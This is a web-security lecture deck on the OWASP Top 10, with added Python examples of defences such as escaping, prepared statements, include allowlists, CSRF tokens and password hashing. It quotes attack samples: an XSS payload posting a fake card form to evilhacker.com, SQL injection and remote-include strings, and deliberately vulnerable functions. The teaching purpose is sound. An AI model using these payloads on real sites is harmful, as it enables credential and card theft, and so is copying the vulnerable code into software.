Web Security
in 15 minutes
Ben Charlton
University of Kent
OWASP Top 10
- Nice concise list
- Good starting point
- Web applications only: it doesn't cover desktop software, or network and server hardening
Cross Site Scripting (XSS)
- Easiest to carry out: any page that echoes user input back without escaping it.
- Can be as simple as http://www.example.com/search?q=stuff
- ... http://example.com/search?q=<blink>
- Scaling up: an unescaped errCode parameter lets the attacker rewrite the page and phish the user on your own domain:
https://example.com/somepage?errCode=</h3><script>c=document.getElementById('content'); c.innerHTML='<form method="post" action="https://evilhacker.com/harvestCC">Enter Credit Card:<input type="text" name="cc"><input type="submit">';</script>
- ACTION: Validate input, and escape all user-supplied data on output, using the escaping rules for the context it lands in (HTML body, attribute value, JavaScript, URL).
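Added example (not from the slides), in Python rather than the deck's PHP: the errCode payload above rendered into a page unsafely and then with context-aware escaping, plus the attribute-value case the search box falls into. The page fragments and the search payload are constructed for the example.

```python
import html

# Constructed payload, as in the errCode URL on the slide: it closes the <h3>
# early and injects a script that replaces the page content with a fake
# credit-card form posting to the attacker's site.
PAYLOAD = (
    "</h3><script>c=document.getElementById('content');"
    "c.innerHTML='<form method=\"post\" action=\"https://evilhacker.com/harvestCC\">"
    "Enter Credit Card:<input type=\"text\" name=\"cc\"><input type=\"submit\">';"
    "</script>"
)


def render_error_unsafe(err_code):
    """Vulnerable: the parameter is pasted straight into the HTML body."""
    return "<h3>Error: " + err_code + "</h3><div id='content'>...</div>"


def render_error_safe(err_code):
    """Hardened: HTML-body context, so &, <, >, \" and ' are escaped on output.
    The browser now shows the payload as text instead of running it."""
    return "<h3>Error: " + html.escape(err_code, quote=True) + "</h3><div id='content'>...</div>"


def render_search_safe(q):
    """The search box echoes q inside an attribute value. quote=True matters here:
    without it, q = x" onfocus="alert(1) would close the attribute and add a handler."""
    return '<input type="text" name="q" value="' + html.escape(q, quote=True) + '">'


def contains_injected_script(page):
    """Check used by the tests: did a live <script> tag survive rendering?"""
    return "<script" in page.lower()
```

Escaping is per context: html.escape is right for body text and quoted attributes, but data placed inside a script block or a URL needs that context's encoding, and unquoted attributes cannot be made safe by escaping at all.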
Injection Flaws
- $sql = "SELECT userid FROM users WHERE username = '" . $_REQUEST['login'] . "' AND password = '" . $_REQUEST['pw'] . "'";
- pw = ' or 1 = '1
- SELECT userid FROM users WHERE
username = 'admin' AND password = '' or 1='1'
- ACTION: Use prepared statements (parameterised queries) or your framework's DB layer, so that data is never parsed as SQL. Input validation helps but is not a substitute.
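Added example (not from the slides), in Python with an in-memory SQLite table constructed for the purpose: the slide's concatenated login query beside the prepared-statement version. One caveat: the slide's pw of `' or 1 = '1` works on MySQL because it casts '1' to a number, but SQLite compares an integer and a string as unequal, so the example uses the string form `' or '1' = '1`, which works on every database.

```python
import sqlite3


def make_db():
    """Constructed users table. Plaintext password column only to mirror the slide's SQL."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (userid INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'correct horse battery staple')")
    db.execute("INSERT INTO users VALUES (2, 'ben', 'letmein')")
    return db


def login_vulnerable(db, login, pw):
    """String concatenation, as in the PHP on the slide. Returns userid or None."""
    sql = ("SELECT userid FROM users WHERE username = '" + login +
           "' AND password = '" + pw + "'")
    # pw = ' or '1' = '1  turns this into
    #   ... WHERE username = 'x' AND password = '' or '1' = '1'
    # which is true for every row, so the first user (admin) is returned.
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def login_safe(db, login, pw):
    """Prepared statement: the values travel separately from the query text and are
    compared as data, so quotes in them never reach the SQL parser."""
    row = db.execute(
        "SELECT userid FROM users WHERE username = ? AND password = ?",
        (login, pw),
    ).fetchone()
    return row[0] if row else None
```

Note that `login_safe` is still a bad login routine in another way: it compares plaintext passwords, which the Insecure Cryptographic Storage slide addresses.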
Injection (comic omitted; source: XKCD)
Malicious File Execution
- http://example.com/index.php?page=about.php
- include $_REQUEST['page'];
- http://example.com/index.php?page=http://evilhacker.com/exploit.php
- ACTION: Never pass user input to include; map it onto an allowlist of known files. An egress firewall helps against remote fetches. PHP: disable allow_url_fopen and allow_url_include. Those stop remote includes only: ../ to local files still works, so the allowlist is the real control.
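Added example (not from the slides), in Python: how the `page` parameter should be resolved. The allowlist, the webroot path and the error handling are assumptions for the example; the point is that the parameter selects from a fixed set of files rather than naming a file.

```python
import os
from urllib.parse import urlsplit

# Constructed allowlist: the only files index.php is ever allowed to include.
ALLOWED_PAGES = {"about.php", "contact.php", "news.php"}


def resolve_page(page_param, webroot="/srv/app/pages"):
    """Turn the ?page= value into a file path, or raise ValueError.

    The allowlist is the real control; the realpath containment check is a
    second line of defence in case the allowlist is ever widened carelessly
    (say, to accept subdirectories).
    """
    if urlsplit(page_param).scheme:                      # http://evilhacker.com/exploit.php
        raise ValueError("remote include refused: " + page_param)
    if page_param not in ALLOWED_PAGES:                  # ../../etc/passwd, config.php.bak, ...
        raise ValueError("unknown page: " + page_param)
    root = os.path.realpath(webroot)
    path = os.path.realpath(os.path.join(root, page_param))
    if os.path.commonpath([root, path]) != root:         # symlink or traversal out of webroot
        raise ValueError("path escapes webroot: " + path)
    return path
```

With allow_url_include off, the first check is redundant on PHP, but the second and third are what stop local file inclusion, which that setting does nothing about.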
Insecure Direct Object Reference
- http://someisp.com/myemail?userid=1024
- http://someisp.com/myemail?userid=1025
- ACTION: Access controls on the server: on every request, check that the logged-in user owns the object the id refers to before showing it. The id is also untrusted input, so check it for XSS and SQL injection too.
Cross Site Request Forgery
- http://somebank.com/transfer?from=me&to=evilhacker&amount=100.00
- MySpace Logout worked with a GET request
- POST is not safe either, contrary to popular belief: a hidden form on the attacker's page can auto-submit a POST to the bank, and the browser attaches the victim's cookies.
- CSRF token checking provided in many frameworks. Helps, but not foolproof.
- Extremely dangerous when combined with XSS
- Samy MySpace worm - 1 million friend requests in 20 hours
- ACTION: Use your framework's CSRF protection (tokens tied to the session). For important changes, re-prompt for the password or confirm by email. Modern browsers also honour the SameSite cookie attribute, which blocks most cross-site requests.
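Added example (not from the slides), in Python: a session-bound CSRF token for the transfer form above, checked by the handler. The token is derived with an HMAC over the session id and the form name, so nothing has to be stored server-side; the secret, session ids and handler shape are constructed for the example.

```python
import hashlib
import hmac
import secrets

# Constructed per-deployment secret; in production load it from configuration.
SERVER_SECRET = secrets.token_bytes(32)


def csrf_token(session_id, action):
    """Token bound to this session and this form. Derived, not stored: the server can
    recompute it from the cookie's session id when the form comes back."""
    msg = (session_id + "|" + action).encode()
    return hmac.new(SERVER_SECRET, msg, hashlib.sha256).hexdigest()


def verify_csrf(session_id, action, submitted):
    """Constant-time comparison so the check itself doesn't leak the token byte by byte."""
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id, action), submitted)


def transfer_handler(session_id, form):
    """POST /transfer. The browser sends the victim's cookie (hence session_id) with a
    cross-site request too, so the cookie proves nothing about who built the form;
    only a token the attacker could not have read does."""
    if not verify_csrf(session_id, "transfer", form.get("csrf")):
        return 403, "CSRF token missing or invalid"
    return 200, "transferred " + form["amount"] + " from " + form["from"] + " to " + form["to"]
```

The attacker's auto-submitting form cannot include the right value because the same-origin policy stops their page reading the victim's page, where the token is embedded. XSS removes exactly that barrier, which is why the two together are so dangerous.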
Information Leakage
- Error messages that give away too much info - filenames or paths on system
- Mostly clues, but not always: different messages for a bad username and a bad password let an attacker enumerate valid accounts:
- "You have entered an incorrect username"
- "Incorrect Password"
- ACTION: Check exception/error handling: show a generic message and log the detail. Make sure dev settings (debug output, stack traces) don't reach production.
Broken Authentication
- Failure to protect credentials and session data
- Rubbish password reset
- Custom 'remember me' functionality
- LDAP: a bind with a user DN and an empty password is an "unauthenticated bind" (RFC 4513), which some directories (Active Directory among them) accept by default, so a login form that passes the password straight through lets anyone in with a blank password.
- ACTION: Too many to list. Use your framework's session and authentication handling rather than your own; at minimum reject empty passwords before binding.
Insecure Cryptographic Storage
- Reversible (or plain text) passwords
- Proprietary vendor: "passwords encrypted with military grade AES-256 encryption blah blah" (encrypted means reversible, and the key lives on the same box)
- Custom encryption (e.g. the proprietary cipher in MIFARE Classic, broken once it was reverse-engineered)
- ACTION: Store only salted password hashes from a slow, purpose-built algorithm (bcrypt, scrypt, Argon2 or PBKDF2). MD5 is rubbish and SHA-1 not great, but a single unsalted SHA-256 is nearly as bad: general-purpose hashes are fast, so they are brute-forced fast.
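Added example (not from the slides), in Python's standard library: salted PBKDF2-HMAC-SHA256 storage with a constant-time verify, plus a check for the unsalted MD5/SHA-1 digests the slide calls rubbish. The record format and iteration count are choices made for the example.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000   # PBKDF2-HMAC-SHA256 work factor; raise it as hardware gets faster


def hash_password(password, salt=None, iterations=ITERATIONS):
    """Return a self-describing record: algorithm, work factor, per-user salt, derived key.
    A fresh random salt per user means identical passwords store differently and
    precomputed (rainbow) tables are useless."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, dklen=32)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and work factor; compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = stored.split("$")
    except ValueError:
        return False
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex),
                             int(iterations), dklen=32)
    return hmac.compare_digest(dk, bytes.fromhex(dk_hex))


def is_legacy_hash(stored):
    """Spot the storage the slide warns about: a bare 32-hex (MD5) or 40-hex (SHA-1)
    digest with no salt and no work factor, the kind an attacker cracks offline at
    billions of guesses per second."""
    return len(stored) in (32, 40) and all(c in "0123456789abcdef" for c in stored.lower())
```

Because the record carries its own iteration count, the work factor can be raised later and old records re-hashed at the user's next successful login.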
Insecure Communications
- Use SSL/TLS for anything carrying credentials or personal data, on every page involved, not just the login form
- BEWARE THE NULL CIPHER: TLS cipher suites with NULL encryption (e.g. TLS_RSA_WITH_NULL_SHA) authenticate the server and integrity-protect the data but send it in the clear. A server that leaves them enabled can negotiate an "SSL" session with no confidentiality, so disable them in the cipher configuration.
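Added example (not from the slides), using Python's ssl module on top of the system OpenSSL: a server context restricted to TLS 1.2+ forward-secret AEAD suites with eNULL and aNULL excluded, an audit helper that reports weak suite names a context could still negotiate, and a probe that shows which NULL suites this OpenSSL build can still be talked into. The cipher string and the marker list are choices made for the example.

```python
import ssl

# Substrings that flag a suite as one a web server should never offer.
WEAK_MARKERS = ("NULL", "RC4", "MD5", "DES", "EXP", "ADH", "AECDH")


def hardened_server_context():
    """Server-side TLS context: TLS 1.2+, AEAD suites with forward secrecy only.
    eNULL (no encryption) and aNULL (no server authentication) are excluded
    explicitly rather than left to the defaults."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.minimum_version = ssl.TLSVersion.TLSv1_2
    ctx.set_ciphers("ECDHE+AESGCM:ECDHE+CHACHA20:!aNULL:!eNULL:!MD5")
    return ctx


def weak_suites(ctx):
    """Audit helper: names of suites the context could still negotiate that carry
    a weak marker. Empty list means the configuration passed."""
    names = {c["name"] for c in ctx.get_ciphers()}
    return sorted(n for n in names if any(m in n for m in WEAK_MARKERS))


def null_suites_in_this_openssl():
    """What 'BEWARE THE NULL CIPHER' refers to: suites that do integrity but no
    encryption. Returns [] when the OpenSSL build or its security level refuses
    to enable them at all, which is the outcome you want."""
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    try:
        ctx.set_ciphers("eNULL")
    except ssl.SSLError:
        return []
    return sorted(c["name"] for c in ctx.get_ciphers() if "NULL" in c["name"])
```

Run `weak_suites` against the context your server actually uses, not a fresh one: the misconfiguration the slide warns about is usually an operator's cipher string that lists suites by name and accidentally keeps the NULL ones.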
Failure to Restrict URL access
- "Hidden" URLs that are simply not linked for unprivileged users are still reachable by anyone who knows or guesses them.
- Lucky guess: http://example.com/admin/adduser.php or http://example.com/config.php.bak
- MacWorld 2007: the code for a free "Platinum" pass worth $1700 was checked in JavaScript in the browser rather than on the server.
- ACTION: Authorise every request on the server, whether or not the UI showed a link to it; beware of important files that rely on security through obscurity.
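Added example (not from the slides), in Python, serving both this slide and the Insecure Direct Object Reference one: a deny-by-default route table checked on every request, and an object-level ownership check for the myemail?userid= case. The routes, roles, users and mailbox ids are constructed for the example.

```python
# Constructed data: which user owns which mailbox, and the role each URL needs.
MAILBOX_OWNER = {1024: "alice", 1025: "bob"}
ROUTES = {"/myemail": "user", "/admin/adduser.php": "admin"}
ROLE_RANK = {"anonymous": 0, "user": 1, "admin": 2}


class Forbidden(Exception):
    pass


def authorise_route(path, role):
    """Deny by default. Anything not in ROUTES is never served, however it is named
    (config.php.bak included), and a known route needs at least its listed role.
    Whether the UI ever showed a link to the path plays no part in the decision."""
    needed = ROUTES.get(path)
    if needed is None or ROLE_RANK.get(role, 0) < ROLE_RANK[needed]:
        raise Forbidden(path)


def read_mailbox(session_user, role, userid):
    """Object-level check for the IDOR slide: ?userid= is a claim, not a permission.
    The owner is looked up server-side and compared with the authenticated user;
    an unknown id gets the same refusal as someone else's, so ids can't be enumerated."""
    authorise_route("/myemail", role)
    if MAILBOX_OWNER.get(userid) != session_user:
        raise Forbidden("userid=%d" % userid)
    return "mailbox %d of %s" % (userid, session_user)
```

The two checks are different things and both are needed: the route check answers "may this role use this function at all", the ownership check answers "may this user touch this particular object".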